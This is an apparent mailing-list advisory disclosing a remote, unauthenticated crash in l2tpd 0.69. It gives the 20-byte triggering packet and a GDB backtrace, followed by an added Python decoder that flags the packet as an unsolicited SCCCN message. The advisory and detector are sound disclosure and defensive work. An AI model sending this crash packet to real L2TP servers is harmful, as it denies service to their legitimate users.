
Remote SIGSEGV in l2tpd





Hi,

I found a denial of service on l2tpd 0.69 - if an attacker sends
data {0xC8,2,0,20,0,0,0,0,0,0,0,0,0,8, 0,0,0,0,0,3} to the L2TPD
server, l2tpd dies with a segfault. An attacker may use this flaw to
prevent legitimate users from connecting via L2TPD.
There's no need for pre-authentication or whatever.

GDB backtrace shows:
Program received signal SIGSEGV, Segmentation fault.
0x280ed04e in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0  0x280ed04e in vfprintf () from /usr/lib/libc.so.4
#1  0x280b5d1e in vsnprintf () from /usr/lib/libc.so.4
#2  0x804afdd in log (level=6, 
    fmt=0x80575e0 "%s: Connection established to %s, %d.  Local: %d,
    Remote: %d.  LNS session is '%s'\n") at misc.c:37
#3  0x804c4f8 in control_finish (t=0x8065800, c=0x8065c00) at
    control.c:623
#4  0x804dcf1 in handle_packet (buf=0x8063000, t=0x8065800, c=0x8065c00)
        at control.c:1692
#5  0x80527ce in network_thread () at network.c:405
#6  0x804af1e in main (argc=3, argv=0xbfbff9e0) at l2tpd.c:1123
#7  0x804930d in _start ()



				-- Renaud
-- 
Renaud Deraison
The Nessus Project
http://www.nessus.org
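
Added example, not part of the original message: decoding the quoted 20 bytes with the RFC 2661 header and AVP layout shows they form an SCCCN control message (the message that completes tunnel setup) addressed to tunnel ID 0, so a monitor can flag any non-SCCRQ control message that names a tunnel the server never assigned. The names `decode_control`, `is_unsolicited` and `known_tunnels` are chosen for this example and are not taken from l2tpd.

```python
import struct

# Packet bytes exactly as quoted in the advisory above.
ADVISORY_PACKET = bytes([0xC8, 2, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0,
                         0, 8, 0, 0, 0, 0, 0, 3])

# Control message types from RFC 2661 section 3.2 (subset).
MESSAGE_TYPES = {1: "SCCRQ", 2: "SCCRP", 3: "SCCCN", 4: "StopCCN", 6: "HELLO"}


def decode_control(pkt):
    """Decode an L2TPv2 control header and its leading Message Type AVP."""
    if len(pkt) < 12:
        raise ValueError("shorter than a control header")
    flags, length, tunnel, session, ns, nr = struct.unpack("!6H", pkt[:12])
    # T (0x8000), L (0x4000) and S (0x0800) are set on control messages;
    # the low four bits carry the protocol version, which must be 2.
    if flags & 0xC800 != 0xC800 or flags & 0x000F != 2:
        raise ValueError("not an L2TPv2 control message")
    if length != len(pkt):
        raise ValueError("length field does not match datagram size")
    info = {"tunnel_id": tunnel, "session_id": session, "ns": ns, "nr": nr,
            "message_type": None}  # None: no body (ZLB) or no Message Type AVP
    if len(pkt) >= 20:
        avp_flags_len, vendor, attr = struct.unpack("!3H", pkt[12:18])
        # Message Type AVP: vendor 0, attribute 0, total length 8 (10-bit field).
        if vendor == 0 and attr == 0 and (avp_flags_len & 0x03FF) == 8:
            code = struct.unpack("!H", pkt[18:20])[0]
            info["message_type"] = MESSAGE_TYPES.get(code, str(code))
    return info


def is_unsolicited(info, known_tunnels):
    """True when anything other than SCCRQ names a tunnel ID not assigned locally.

    known_tunnels is an assumed set of tunnel IDs the server has handed out.
    SCCRQ is exempt because it legitimately arrives with tunnel ID 0.
    """
    return info["message_type"] != "SCCRQ" and info["tunnel_id"] not in known_tunnels


if __name__ == "__main__":
    decoded = decode_control(ADVISORY_PACKET)
    print(decoded, "unsolicited:", is_unsolicited(decoded, set()))
```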